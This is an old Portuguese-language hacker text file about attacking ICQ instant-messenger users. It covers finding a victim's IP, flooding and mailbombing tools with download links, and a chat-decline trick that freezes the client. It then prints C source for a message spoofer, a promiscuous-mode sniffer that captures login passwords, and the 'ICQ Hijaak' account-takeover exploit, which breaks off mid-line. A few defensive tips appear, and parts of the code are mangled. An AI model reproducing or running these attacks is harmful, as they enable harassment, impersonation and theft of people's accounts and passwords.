<><><><><><><><><><><><><> 2 ICQ 2 BY Draco & Dead*Pool - WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING--WARNING- | | | ESTE TEXTO CONTEM TUDO E MAIS UM POUCO SOBRE O ICQ, PELO MEU VER | | ISTO TUDO É INUTIL DESDE QUE HACKING DE VERDADE NAO É SNIFFAR O | | COLEGUINHA E NEM FLOODEALO, ISTO NADA MAIS É QUE LAMMAHISSE. | | AO INSTALAR O ICQKILLER FIQUEM ATENTOS AO TROJAN CONTIDO NESTE | | PROGRAMA, PARA MAIORES INFORMAÇOES VAO ATÉ A TXT HOME PAGE EM | | HTTP://FLY.TO/TXT, O RESTO É LUCRO BOM DIVERTIMENTO | | | -WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING--WARNING- {[(-INTRODUÇAO)]} : Nesse texto é claro que vamos falar sobre o ICQ. Realmente nao há nada de muito interessante pra falar, mas muitas pessoas já nos vieram perguntar diversas vezes sobre isso. O icq é um dos melhores programas de comunicaçao disponiveis na internet. Ele pode ser achado em www.mirabilis.com. {[(-INDICE-)]} : Iniciando o ataque Atacando no ICQ Defendendo no ICQ {[(-INICIANDO O ATAQUE-)]} : Antes de podermos fazer um ataque a um usuário do ICQ precisamos primeiro pegar o seu IP. Normamente o IP ficaria no "info" mas o ICQ 98 tem uma opçao que esconde o IP (N/A). Mas na verdade ele nao esconde muito bem. Há diversas maneiras de se conseguir O IP mesmo com N/A no info. Aqui vou falar tres delas : 1║)LAMER : Se você quiser voce pode fazer o download do ICQ 97 (versao antiga do ICQ). Com ele o IP nunca vai aparecer N/A! Mas isso é muita burrice. 2║)Metodo offline : Esse é o metodo bom de fazer, apenas fique offline(NO ICQ!) e o IP do usuário(com ou sem N/A) vai aparecer no info!! 3║)Metodo netstat : Isso aqui pode ser meio chato de fazer. Enquanto o ICQ estiver aberto abra o DOS prompt e deixe aberto. E envie uma msg para a vitima, enquanto a msg está indo, volte no prompt e digite "netstat". Isso vai mostrar todas as conecçoes que voce está executando naquele momento. Quando você manda uma msg de ICQ voce está fazendo uma conecçao direta com o computador da vitima, entao digite "netstat" e uma lista de IPs deve aparecer. Provavelmente O IP do cara deve estar lá. As conecçoes do CP sao 80 ou 8080 sao pages na net, 21 é de FTP,23 é telnet, Entao nenhuma dessas é o IP dele. 4║)ICQ snifer : Esse é o melhor metodo de pegar o IP de uma pessoa no ICQ. Coloque o UIN do usuário e clique em sniff IP. Zam..! O IP aparece na hora. {[(-ATACANDO NO ICQ-)]} : PROGRAMAS : Para atacar um usuario do ICQ você vai precisar de alguns programas. Esses programas na maioria das vezes floodeiam seu ICQ, ou seja você vai começar a receber milhares de mensagens simultaneamente de diversos(ou apenas um) UINs. Isso travaria completamente o seu ICQ. ------------------------------------------------------------------------------------------- | Programa | ICQbomber | icq chat flooder | |----------|-----------------------------------------|-------------------------------------| | Download | members.xoom.com/fw1/bomber.zip | members.xoom.com/fw1/chatf.zip | |----------|-----------------------------------------|-------------------------------------| | Criador | Graffiti | Graffiti | |----------|-----------------------------------------|-------------------------------------| | Tamanho | 149kb | 12k | |----------|-----------------------------------------|-------------------------------------| | Descriçao| Esse programa bombardeia o usuario | Esse programa enche o saco de quem | | | a partir o sistema mail express do | esiver no chat do ICQ. O que ele | | | icq | | | | | O usuario ira receber diversas mensagens| faz é encher o chat de buzinas ou | | | , mas serao pelo mail do ICQ, | de texto Oferece as opþ§es as | | | e nao por random user. | opþ§es Horn-Flood, Text-Flood ou | | | | entao (Horn+Text)-Flood. | | | | | --------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------ | Programa | IcKiller | Flooder | |----------|-----------------------------------------|-------------------------------------| | Download | members.xoom.com/fw1/ickiller.zip | members.xoom.com/fw1/flooder.zip | |----------|-----------------------------------------|-------------------------------------| | Criador | Graffiti | Phineas phreak | |----------|-----------------------------------------|-------------------------------------| | Tamanho | 512k | 44k | |----------|-----------------------------------------|-------------------------------------| | Descriçao| O melhor de todos os programas para | Tem a mesma funçao que o | | | floodear o icq. É o mais rápido, | ickiller mas é menos potente, | | | funciona melhor. Você pode escolher | rápido e tem menos opçoes | | | a mensagem que voce quer mandar, as | | | | mensagens podem ser infinitas, | | | | voce pode usar um uin especifico ou | | | | randon user. | | ------------------------------------------------------------------------------------------ Para usar os dois programas da tabela acima você terá que realizar alguns procedimentos : -Você deve saber o IP do usuário que voce quer atacar.(leia a seçao "iniciando o ataque" para maiores informaçoes). -Para efetuar o atque você precisara conectar a uma porta do computador do usuário. A porta padrao é a 1027 porém as portas de 1000 a 7000 podem ser usadas entao passe um portscan (geocities.com/baja/2956/portscan) no IP do usuário . Pronto, agora preencha os espaços pedidos no programa e bombeie. USANDO SEU E-MAIL BOMBER PARA BOMBEAR O ICQ : O ICQ oferece um sistema chamado "mail express", esse sistema permite que você mande e-mails (de ICQ, nao e-mails de verdade) para outros usuários. Entao vamos aproveitar desse sistema para bombear um usuário exatamente como um mailbomb faz. O mailbomb manda diversas mensagens para o e-mail da vitima, isso é exatamente o que vamos fazer, enviar um monte de mensagens para o icq de um usuário. Tudo que você vai precisar é um programa de mailbomb (members.xoom.com/fw1/unabomb.zip) e do UIN do usuário. Voce NAO precisar ter ele na sua lista para enviar as mensagens. Entao coloque seu mailbomber para bombear o seguinte e-mail : "UIN"@pager.mirabilis.com Exemplo : 3637214@pager.mirabilis.com Pronto! Isso é exatamente o que o ICQbomber faz, porem é muito mais rápido. USANDO UM CHAT REQUEST PARA TRAVAR UM USUARIO : Quando você recebe um chat, voce tem a chance de recusar. Entao clique em recusar (decline) e enter a reason. Coloque entao um "." no inicio da mensagem e de "enter" até terminar o espaço. A mensagem de decline vai aparecer maior que a tela do cara e ele nao vai conseguir fechar! ICQ SPOOFER : Aqui vai um programinha muito "divertido"! O que ele faz é mandar mensagens através de outros usuários. É, vamos supor que um usuario "A" queira mandar uma msg para "B", mas através do usuário "C". Entao ele iria usar esse programa. Com ele você pode causar diversas confusoes por ai. hehe PARA LINUX : --------------Corte aqui /* icqspoof.c - v2. This program sends a message to a given ICQ user and it * will appear to be from an arbitrary UIN. Loads of fun. * * Notes: * As many of you know icqflood.c has been distributed by enkil^ and irQ. * They claim their program is all their own work. Yet the "header" they * use contains MY UIN. Strange, eh? * A simple, "Packet Dump that we based our exploit on provided by Seth * McGann" would have been enough. Even though I didn't specifically * request credit it might have been nice to say something. In the future * when you expand on someone's idea and work (yeah those traces didn't fall * out of the sky ya know) give credit where credit is due. * * Concept, Protocol Analysis and Coding: Seth McGann * Some functions dealing with socket scanning: icqflood.c by enkil^ and irQ * With help from my roomate (target practice) * And yes, this still works with ICQ 98. Coming soon: Chat and File Spoofing */ #include #include #include #include #include #include #include #include int main(argc, argv) int argc; char *argv[]; { struct sockaddr_in sin; int sock,i,x,y; unsigned long uin; int Port; char buffer[16]; int connected = 1; typedef struct icq_prot { unsigned char magicNum[2]; unsigned char UIN[4]; unsigned char unknown[4]; unsigned char unknown2[2]; unsigned char length[2]; unsigned char strng[256]; } icq_prot; icq_prot sendMessage; unsigned long temp; unsigned char bigguy[1024]; if (argc != 6) { fprintf(stderr,"Usage: icqspoof ip SpoofedUIN message startport endport\n"); exit(1); } Port = ScanPort(argv[1],atoi(argv[4]),atoi(argv[5])); if (Port == -1) { printf("No ICQ Port Found =(\n"); return; } sendMessage.magicNum[0]=0x2e; sendMessage.magicNum[1]=0x0; sendMessage.unknown[0]=0x04; sendMessage.unknown[1]=0x01; sendMessage.unknown[2]=0x0F; sendMessage.unknown[3]=0x0; sendMessage.unknown2[0]=0x01; sendMessage.unknown2[1]=0x0; temp=atol(argv[2]); sendMessage.UIN[0]=temp & 0xFF; sendMessage.UIN[1]=(temp >> 8) & 0xFF; sendMessage.UIN[2]=(temp >> 16) & 0xFF; sendMessage.UIN[3]=0; strncpy(sendMessage.strng,argv[3],256); sendMessage.length[0]=strlen(sendMessage.strng)+1; sendMessage.length[1]=0; if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) { printf("Error: Unable to creat socket, Exiting.\n"); exit(1); } sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(Port); if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) { printf("Error Connecting to Socket\n"); return; } x=20; bigguy[0]=(41+strlen(sendMessage.strng)+1) & 0xFF; bigguy[1]=((41+strlen(sendMessage.strng)+1) >> 8) & 0xFF; bigguy[2]=sendMessage.UIN[0]; bigguy[3]=sendMessage.UIN[1]; bigguy[4]=sendMessage.UIN[2]; bigguy[5]=sendMessage.UIN[3]; bigguy[6]=0x02; bigguy[7]=0x00; bigguy[8]=0xEE; bigguy[9]=0x07; bigguy[10]=0x00; bigguy[11]=0x00; bigguy[12]=sendMessage.UIN[0]; bigguy[13]=sendMessage.UIN[1]; bigguy[14]=sendMessage.UIN[2]; bigguy[15]=sendMessage.UIN[3]; bigguy[16]=0x01; bigguy[17]=0x00; bigguy[18]=sendMessage.length[0]; bigguy[19]=sendMessage.length[1]; for(i=0;i void Usage(void) { fprintf (stderr, "USAGE: %s \n", MYNAME); } int main(int argc, char *argv[]) { unsigned long netmask, ipaddr, netaddr, broadcast; int in[4], j; unsigned char bc[4],na[4]; if (3 != argc) { Usage(); exit(1); } /* Check netmask */ if (4 != sscanf(argv[1],"%d.%d.%d.%d", &in[0],&in[1],&in[2],&in[3])) { fprintf (stderr,"Invalid netmask \"%s\".\n", argv[1]); Usage(); exit(1); } for (j=0; j<4; ++j) { if (in[j]<0 || in[j]>255) { fprintf (stderr, "Invalid octet %d in netmask \"%s\".\n", j+1, argv[1]); Usage(); exit(1); } } netmask = in[3] + 256 * (in[2] + 256 * (in[1] + 256 * in[0])); /* Check IP address */ if (4 != sscanf(argv[2],"%d.%d.%d.%d", &in[0],&in[1],&in[2],&in[3])) { fprintf (stderr,"Invalid IP address \"%s\".\n", argv[2]); Usage(); exit(1); } for (j=0; j<4; ++j) { if (in[j]<0 || in[j]>255) { fprintf (stderr, "Invalid octet %d in IP address \"%s\".\n", j+1, argv[1]); Usage(); exit(1); } } ipaddr = in[3] + 256 * (in[2] + 256 * (in[1] + 256 * in[0])); broadcast = ipaddr | (~ netmask); bc[0] = broadcast / 256 / 256 / 256; bc[1] = (broadcast / 256 / 256) % 256; bc[2] = (broadcast / 256) % 256; bc[3] = broadcast % 256; netaddr = ipaddr & netmask; na[0] = netaddr / 256 / 256 / 256; na[1] = (netaddr / 256 / 256) % 256; na[2] = (netaddr / 256) % 256; na[3] = netaddr % 256; printf ("%d.%d.%d.%d %d.%d.%d.%d\n", bc[0], bc[1], bc[2], bc[3], na[0], na[1], na[2], na[3]); exit(0); return 0; } ----------------------Corte aqui Texto a sequir editado por Soul Hunter, retirado do zine nearz Sao publicaçao de informaçao, nao queremos tirar nenhuma vantagem sobre vocês (da nearz). 2║)Ickiller protect : Há um programa criado para "defender" os ataques do ickiller! Esse programa está disponivel em "members.xoom.com/fw1/ickillerprotect.zip". Apesar de funcionar, esse programa tem um grande problema. Ele nao impede que você seja bombeado, e sim ele para o ataque. Para usa-lo, quando você for bombeado abra o programa, digite seu uin e clique em stop (parar). E pronto, ele vai fechar o ICQ e reabri-lo, automaticamente e todas mensagens vao sumir. 3║)Firewall : O primeiro programa brasileiro a floodear um usuario usando o sistema random user do icq foi o flooder. Esse programa faz um ataque de cliente a cliente, ou seja de voce ao usuario a ser bombeado. Para isso ele tera que se conectar a uma porta do seu computador. A porta padrao do ICQ é a 1027. Na maioria das vezes ela está aberta e o usuario é bombeado a partir dela. O que iremos fazer para nos defendermos dos ataques dos flooders é travar o acesso dessas portas. Para isso iremos usar uma firewall. Firewall (parede de fogo) é um programa que impede qualquer conecçao com portas selecionadas. A que eu uso é a firewall da Mcfee (ftp://ftp.nlink.com.br/incoming/ProteþÒo-lOgltEcH/psw102l.zip). Arranje a firewall e instale. Agora abra a firewall e vá na seçao Rule list. E clique em add. Uma nova janela se abrirá, agora você tem que selecionar as portas que voce deseja colocar a firewall. Aqui vai como deverá ficar suas opçoes :(as opçoes com "║" sao pra voce selecionar) ----------------------Visulizaçao das configuraçoes do programa--------------- ║All IP adress |--RULE TYPE--| |----LOCAL PORT SELECTION-----| |Allow in | |all ports | |allow out | |single port | |║disallow in | |║ports from "1000" to "7000" | |disallow out | ----------------------------- ------------- |--PROTOCOL--| |----REMOTE PORT SELECTION----| |║tcp/ip | |all ports | |udp | |single port | ------------ |║ports from "1000" to "7000" | ----------------------------- ----------------------Visulizaçao das configuraçoes do programa--------------- Configure um novo rule list assim e pronto! Voce nao recebera mais os floods de ICQ. Mas aviso que seu ICQ vai ficar uma bosta em conecçao!! (uma bosta mesmo) 4║)MAILBOMBING DE ICQ : Para impedir que o voce seja bombardeado vamos impedir que as mensagens do sistema mailexpress. Para isso abra o ICQ, vá no menu e entao em security & privacity. Uma nova janela irá se abrir. Entre na seçao de ignore list e selecione a opçao "Do not accept mailexpress messages". E salve as alteraçoes. Voce nunca mais será bombeado dessa maneira. Texto a seguir editado por Draco. AGORA que os nenems aprederam a mexer no ICQ e a fazer TODAS as lamahisses do MUNDO vamos ao que realmente importa. Os programas estarao na ordem que eu os coloco tipo eu vou dar a descriçao de TODOS os programas e depois coloco eles PROGRAMAS ESCRITOS EM C. Um pequeno HTML que spoofa por meio de um CGI. SNIFFER SNIFFA o host nem me pergunta........ HIJAAK Estava eu feliz na rootshell quando vi algo bem legal. Um prog que catava a senha do ICQ da lammah e mudava a mesma. COOOOOOOOOOOOOLLLLLLLL mas se alguem consseguir usar esta bosta me avisa. TEORIA O prog escaneia a porta da vitima, derruba o alvo e sniffa o server... ai o cara conecta, o server verifica a senha e a senha é sniffada... entao o cara conecta no server e é derrubado de novo ai segundo a teoria quando o cara cai se adiciona ele com uma nova senha... dai quando ele volta ele nao fica mais online pq vc já registrou ele com outra senha. WIN 95 ------SORY ONLY LINUX -----HEHEHEHEHEHEHEHE --------------HTML SPOOF ICQ Spoofer
ICQ Spoofer

    IP(ip do usußrio a receber a mensagem):


    No. do ICQ origem do usußrio que supostamente enviou a mensagem (UIN):


    Mensagem:


---------------------Corte aqui ----------------SNIFFER */ /* * Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and * how easy it is to snoop it. */ #include #include #include #include #include #include #include #include #include #include #include /* * PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK */ #define MY_CLIENT_TO_WATCH 0x7F000001 static int create_socket(void) { int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL)); if(s==-1) { perror("socket"); exit(1); } return s; } static void close_socket(int s) { close(s); } static void promiscuous(int s, char *iface, int onoff) { struct ifreq ifr; strcpy(ifr.ifr_name, iface); if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1) { perror("SIOCGIFFLAGS"); exit(1); } strcpy(ifr.ifr_name, iface); if(onoff) ifr.ifr_flags|=IFF_PROMISC; else ifr.ifr_flags&=~IFF_PROMISC; if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1) { perror("SIOCSIFFLAGS"); exit(1); } } static __inline__ ip_p(unsigned char *packet, int len) { if(packet[12]==0x08 && packet[13]==0x00) return 1; return 0; } struct icqhdr { unsigned char version[2] __attribute((packed)); /* ?? */ unsigned short command __attribute((packed)); unsigned short sequence __attribute((packed)); unsigned long uid __attribute((packed)); unsigned char data[0]; }; struct icqack { unsigned char version[2] __attribute((packed)); /* ?? */ unsigned short result __attribute((packed)); unsigned short sequence __attribute((packed)); unsigned char data[0]; }; struct icqstring { unsigned short len; char data[0]; }; struct icqlogin { struct icqhdr hdr __attribute((packed)); unsigned long dunno __attribute((packed)); /* 000006FE.L */ unsigned short pw_len __attribute((packed)); unsigned char pw_data[11] __attribute((packed)); struct in_addr addr __attribute((packed)); /* Rest is a mystery right now */ /* 0.L */ /* 2.L */ /* 0000004C, 00000000 */ /* 00 78 */ }; static void print_icq_string(struct icqstring *s) { fwrite(s->data, s->len-1, 1, stdout); } /* * Scan a packet for clues */ static int process_packet(struct sockaddr *sa, unsigned char *packet, int len) { int i; int lv; int d=0; static long num=0; struct iphdr *iph; struct udphdr *udphdr; if(strcmp(sa->sa_data,"eth0")) return 0; /* Wrong port */ if(!ip_p(packet, len)) return 0; iph=(struct iphdr *)(packet+14); udphdr=(struct udphdr *)(iph+1); /* assume no options */ lv=ntohs(udphdr->len); if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000)) { return 0; } /* printf("packet %d \r", ++num);*/ if(iph->saddr==htonl(MY_CLIENT_TO_WATCH)) { printf("To Server: %d bytes\n", lv); } else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH)) { printf("From Server: %d bytes\n", lv); d=1; } else return 0; i=14+sizeof(struct iphdr); if(len-i>lv) len=i+lv; i+=sizeof(struct udphdr); /* printf("UDP size %d\n",i);*/ if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr)) { struct icqhdr *p=(struct icqhdr *)(udphdr+1); if(d==0) { printf("From %ld\n",p->uid); printf("Version: %d.%d\nCommand ", p->version[1], p->version[0]); switch(p->command) { case 0x000A: printf("Ack"); break; case 0x03E8: { struct icqlogin *il=(struct icqlogin *)p; printf("Login Password "); print_icq_string((struct icqstring *)&il->pw_len); printf(" IP %s", inet_ntoa(il->addr)); break; } #if 0 case 0x0x?? { struct in_addr v=*(struct in_addr *)p->data; printf("Ping %s", inet_ntoa(v)); break; } #endif case 0x409: { printf("Ping"); break; } case 0x0438: { struct icqstring *s=(struct icqstring *)p->data; printf("Disconnect ("); print_icq_string(s); printf(")"); break; } case 0x0456: { /* data +4,5 is always 0100 */ struct icqstring *s=(struct icqstring *)(p->data+6); printf("Message to %ld ", *((long *)p->data)); print_icq_string(s); break; } case 0x0460: { printf("Information %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) ); break; } case 0x046A: { printf("Information_2 %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) ); break; } case 0x04D8: { printf("Status "); switch(*((long *)p->data)) { case 0x00: printf("[Away 0]"); break; case 0x01: printf("[Away 1]"); break; case 0x10: printf("[DND 0]"); break; case 0x11: printf("[DND 1]"); break; default: printf("%04X", *((long *)p->data)); } break; } default: printf("%04X", p->command); } if(p->sequence) printf("\nSequence %d\n", p->sequence); else printf("\n"); } } if(i>=sizeof(struct icqack)+sizeof(struct udphdr)) { struct icqack *p=(struct icqack *)(udphdr+1); if(d==1) { printf("Version: %d.%d\nReply ", p->version[1], p->version[0]); switch(p->result) { case 0x000A: printf("Ack"); break; case 0x00E6: printf("Away Reply "); printf("for %ld", *((long *)p->data)); break; case 0x0118: { struct icqstring *is; printf("InfoID %d\n", *((short *)p->data)); printf("ICQ ID %ld\n", *((long *)p->data+2)); is=(struct icqstring *)(p->data+6); printf("Nick "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nName "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf(" "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nEMail "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nInfo "); print_icq_string(is); break; } default: printf("%04X", p->result); } if(p->sequence) printf("\nSequence %d\n", p->sequence); else printf("\n"); } } while(i=32 && c< 127) printf("%c", c); else printf("."); } printf("\n"); i+=8; } printf("\n"); fflush(stdout); return 0; } int main(int argc, char *argv[]) { int s; unsigned char buf[1600]; struct sockaddr sa; int salen; int len; s=create_socket(); promiscuous(s, "eth0", 1); while(1) { salen=sizeof(sa); if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1) { perror("recvfrom"); close_socket(s); exit(1); } process_packet(&sa, buf,len); } printf("An error has occured.\n"); close_socket(s); exit(0); } ---------------------Corte aqui --------------------HIJAAK /* . ICQ Hijaak . Version 1C . . Author: wumpus@innocent.com . Copyright (c) 1998 Wolvesbane . . By downloading or compiling this program, you agree to the terms of this . license. If you do not agree with any of these terms you MUST delete this . program immediately from all storage areas (including browser caches). . (A) You agree not to use this program in any way that would constitute a . violate of any applicable laws. This may included federal laws if you . live in the United States and similar laws regarding computer security . in other countries. . (B) You agree to hold the authors (referred to collective as Wolvesbane) . harmless in any damages that result due to your possession or use of . this software. . (C) Wolvesbane does not claim that this program implements any functions. . As the saying goes, "You get what you pay for." -- And you didn't pay . anything for this. . (D) This software is FREE for _NON-COMMERCIAL_ use. You may not use this . program for any commercial use (or any other activity which makes you . money with the assistance of this program ). The author is not . interested in commercial use of this program (and cannot think of what . commercial use would consist of ). . (E) This program was created using Linux with IP-Masquerading to run the . ICQ program unmodified and without any dissassembly. The testing . was done with volunteers, and with a second computer logged into the . ICQ network. No ICQ users were harmed in the creation or testing of . this program. . (F) This copyright applies only to the code written by Wolvesbane, and not . to anything included under Fair Use. . (G) Please note that if you use ANY sections of this code in your work, . (which I expressly allow as long as it is NON-COMMERCIAL), you are . obligated to give me some credit in your comments (if it is a source . file ) or in a string constant if it is a binary file. If you do not . wish to do so, you may NOT include ANY portion of this file in your . own work. */ /* * UPDATES, for May 31, 1998 * * I notified Mirabilis about this bug about a month ago (which from * what I recall is the semi-official delay to allow a fix ). * In that time, Mirabilis has gone from DLL 1.22 to DLL 1.26. This * exploit has been tested again 1.26 and still works. *ooops*! * This exploit has rather simplistic UDP scanning code... if it doesn't * work (ie, against .se hosts ), then you can't hijaak them. Sorry, but * I just don't care enough. * * Lastly, even a Windows user can get anyone's IP from ICQ by sending a * message to their UIN, and doing a netstat. * * With the acquistion of Mirabilis and the ICQ protocol by AOL, I will * no longer be playing with the ICQ protocol. Prior to that actual event * you might contact me with questions on this program. */ /* . I am indebted to the author of ICQSNIFF.C, for his clear description of . the ICQ protocol (although it has since changed). And for the idea as . well. . . Some information came from anonymous sources and Usenet postings which . I didn't jot down the author. I apologize to any author who sees his/her . ideas in here. None of this code was "stolen". . */ /* To quote Arik: Arik Vardi (arik@ICQ.COM) Mon, 15 Dec 1997 13:55:16 -0500 Thanks for the vote of confidence. Actualy, we don't publish the protocol since it's a work in progress and we still have pretty major changes from version to version. Password encryption will be addressed in the next client release, spoofing client messages has already been addressed in our new version - ICQ98a, (which is not what you are using) and should not be possible once we phase out older clients (hopfuly by the end of this month). We apreciate your pointing out vulnrabilities to us and will do our best to fix them in future releases. */ /* . Guess what, Arik. You *lied* about fixing spoofing -- and this proves it. */ #include #include #include #include #include #include #include #include /* for AF_INET */ #include #include #include int MultiResolve( char * hostname, int * addr_count, struct in_addr ** addresses ); enum { FAILURE = -1, SUCCESS = 0 }; /*=========================================================================*/ typedef unsigned short int u16; typedef unsigned long int u32; typedef unsigned char u8; /*=========================================================================*/ #define byte(v,o) (*((u8 *)(&(v))+(o))) #define word(v,o) (*((u16 *)((unsigned char *)(&(v))+(o)) )) #define dword(v,o) (*((u32 *)((unsigned char *)(&(v))+(o)) )) unsigned char icq_check_data[256] = { 0x0a, 0x5b, 0x31, 0x5d, 0x20, 0x59, 0x6f, 0x75, 0x20, 0x63, 0x61, 0x6e, 0x20, 0x6d, 0x6f, 0x64, 0x69, 0x66, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x6f, 0x75, 0x6e, 0x64, 0x73, 0x20, 0x49, 0x43, 0x51, 0x20, 0x6d, 0x61, 0x6b, 0x65, 0x73, 0x2e, 0x20, 0x4a, 0x75, 0x73, 0x74, 0x20, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x22, 0x53, 0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x66, 0x72, 0x6f, 0x6d, 0x20, 0x74, 0x68, 0x65, 0x20, 0x22, 0x70, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65, 0x6e, 0x63, 0x65, 0x73, 0x2f, 0x6d, 0x69, 0x73, 0x63, 0x22, 0x20, 0x69, 0x6e, 0x20, 0x49, 0x43, 0x51, 0x20, 0x6f, 0x72, 0x20, 0x66, 0x72, 0x6f, 0x6d, 0x20, 0x74, 0x68, 0x65, 0x20, 0x22, 0x53, 0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x69, 0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x63, 0x6f, 0x6e, 0x74, 0x72, 0x6f, 0x6c, 0x20, 0x70, 0x61, 0x6e, 0x65, 0x6c, 0x2e, 0x20, 0x43, 0x72, 0x65, 0x64, 0x69, 0x74, 0x3a, 0x20, 0x45, 0x72, 0x61, 0x6e, 0x0a, 0x5b, 0x32, 0x5d, 0x20, 0x43, 0x61, 0x6e, 0x27, 0x74, 0x20, 0x72, 0x65, 0x6d, 0x65, 0x6d, 0x62, 0x65, 0x72, 0x20, 0x77, 0x68, 0x61, 0x74, 0x20, 0x77, 0x61, 0x73, 0x20, 0x73, 0x61, 0x69, 0x64, 0x3f, 0x20, 0x20, 0x44, 0x6f, 0x75, 0x62, 0x6c, 0x65, 0x2d, 0x63, 0x6c, 0x69, 0x63, 0x6b, 0x20, 0x6f, 0x6e, 0x20, 0x61, 0x20, 0x75, 0x73, 0x65, 0x72, 0x20, 0x74, 0x6f, 0x20, 0x67, 0x65, 0x74, 0x20, 0x61, 0x20, 0x64, 0x69, 0x61, 0x6c, 0x6f, 0x67, 0x20, 0x6f, 0x66, 0x20, 0x61, 0x6c, 0x6c, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x20, 0x73, 0x65, 0x6e, 0x74, 0x20, 0x69, 0x6e, 0x63, 0x6f, 0x6d, 0x69, 0x6e }; #define MAX_NUM_ADDRESSES 255 int Resolve( char * hostname, struct in_addr * addr ) { struct hostent * hinfo; (void)memset( (void *)addr, 0, sizeof( struct in_addr )); if ( inet_aton( hostname, addr) ) return SUCCESS; if ( !(hinfo = gethostbyname( hostname ) ) ) return FAILURE; (void)memcpy( (void *)addr, (void *)hinfo->h_addr, sizeof(struct in_addr )); return SUCCESS; } int MultiResolve( char * hostname, int * addr_count, struct in_addr ** addresses ) { int host_count; int i; char * p; struct in_addr address; struct hostent * hinfo; if ( inet_aton( hostname, &address ) ) { p = (char *)malloc(sizeof(address)); if ( !p ) { fprintf(stderr,"MultiResolve: Allocation failed!\n"); return FAILURE; } (void)memcpy((void *)p,(void *)&address, sizeof(address) ); *addr_count = 1; *addresses = (struct in_addr *)p; return SUCCESS; } if ( !(hinfo = gethostbyname(hostname) ) ) return FAILURE; if ( hinfo->h_length != sizeof( struct in_addr ) ) { fprintf(stderr,"MultiResolve: h_length (%d) not equal "\ "to size of struct inaddr (%d) ", hinfo->h_length, sizeof(struct in_addr) ); return FAILURE; } host_count = 0; for (i = 0; i < MAX_NUM_ADDRESSES; i++ ) { struct in_addr * addr_ptr; addr_ptr = (struct in_addr *)hinfo->h_addr_list[i]; if ( !addr_ptr ) break; host_count++; } p = (char *)malloc( host_count * hinfo->h_length ); if ( !p ) { fprintf(stderr,"MultiResolve: Failed to allocate %d bytes\n", host_count * hinfo->h_length ); return FAILURE; } *addresses = (struct in_addr *)p; for ( i = 0; i < host_count; i++ ) { (void)memcpy( (void *)p,(void *)hinfo->h_addr_list[i], hinfo->h_length ); p += hinfo->h_length; } *addr_count = host_count; return SUCCESS; } #define IP_VERS 0 #define IP_TOS 1 #define IP_TOTLEN 2 #define IP_ID 4 #define IP_FLAGS 6 #define IP_TIMETOLIVE 8 #define IP_PROTOCOL 9 #define IP_CHECKSUM 10 #define IP_SRC 12 #define IP_DST 16 #define IP_END 20 #define UDP_SOURCE 0 #define UDP_DEST 2 #define UDP_LENGTH 4 #define UDP_CHECKSUM 6 #define UDP_END 8 #define UCHDR_SOURCE 0 #define UCHDR_DEST 4 #define UCHDR_PROTOCOL 9 #define UCHDR_UDPLEN 10 #define UCHDR_END 12 #define ICMP_TYPE 0 #define ICMP_CODE 1 #define ICMP_CHECKSUM 2 #define ICMP_END 4 u16 cksum( u16 * buf, int numWords ) { u32 sum; sum = 0; while ( numWords -- ) { sum += *(buf++); } sum = ( sum >> 16) + ( sum & 0xffff ); sum += ( sum >> 16 ); return ~sum ; } void make_ip_hdr( u8 * packet, int length, u8 protocol, u16 id, u16 flags, struct in_addr me, struct in_addr you, u8 ttl ) { memset( packet, 0, IP_END ); byte(*packet, IP_VERS ) = 0x45; word(*packet, IP_TOTLEN ) = htons( length ); byte(*packet, IP_TIMETOLIVE ) = ttl; byte(*packet, IP_PROTOCOL ) = protocol; word(*packet, IP_ID ) = htons( id ); word(*packet, IP_FLAGS ) = htons( flags ); dword(*packet,IP_SRC ) = *((u32 *)&me); dword(*packet,IP_DST ) = *((u32 *)&you); word(*packet, IP_CHECKSUM ) = cksum( (u16 *)packet, IP_END/2 ); } void make_udp_hdr( u8 * packet, int udplength, u16 sport, u16 dport ) { u8 * udp; static u8 chdr[UCHDR_END]; u32 pchecksum; memset( chdr, 0, UCHDR_END ); udp = packet + ( ( byte(*packet, IP_VERS ) & 0x0F ) * 4 ); memset( udp, 0, UDP_END ); word(*udp, UDP_SOURCE ) = htons( sport ); word(*udp, UDP_DEST ) = htons( dport ); word(*udp, UDP_LENGTH ) = htons( udplength ); memcpy( chdr + UCHDR_SOURCE, packet + IP_SRC, 8 ); byte( *chdr, UCHDR_PROTOCOL ) = byte( *packet, IP_PROTOCOL ); word( *chdr, UCHDR_UDPLEN ) = word( *udp, UDP_LENGTH ); pchecksum = ( ~cksum( (u16 *)&chdr, UCHDR_END / 2 ) ) & 0xFFFF; if ( udplength & 1 ) { byte( *udp, udplength + 1 ) = 0; } pchecksum += ( ~cksum((u16 *)udp, udplength/ 2 + (udplength&1)) ) & 0xFFFF; pchecksum += ( pchecksum >> 16 ); word( *udp, UDP_CHECKSUM ) = 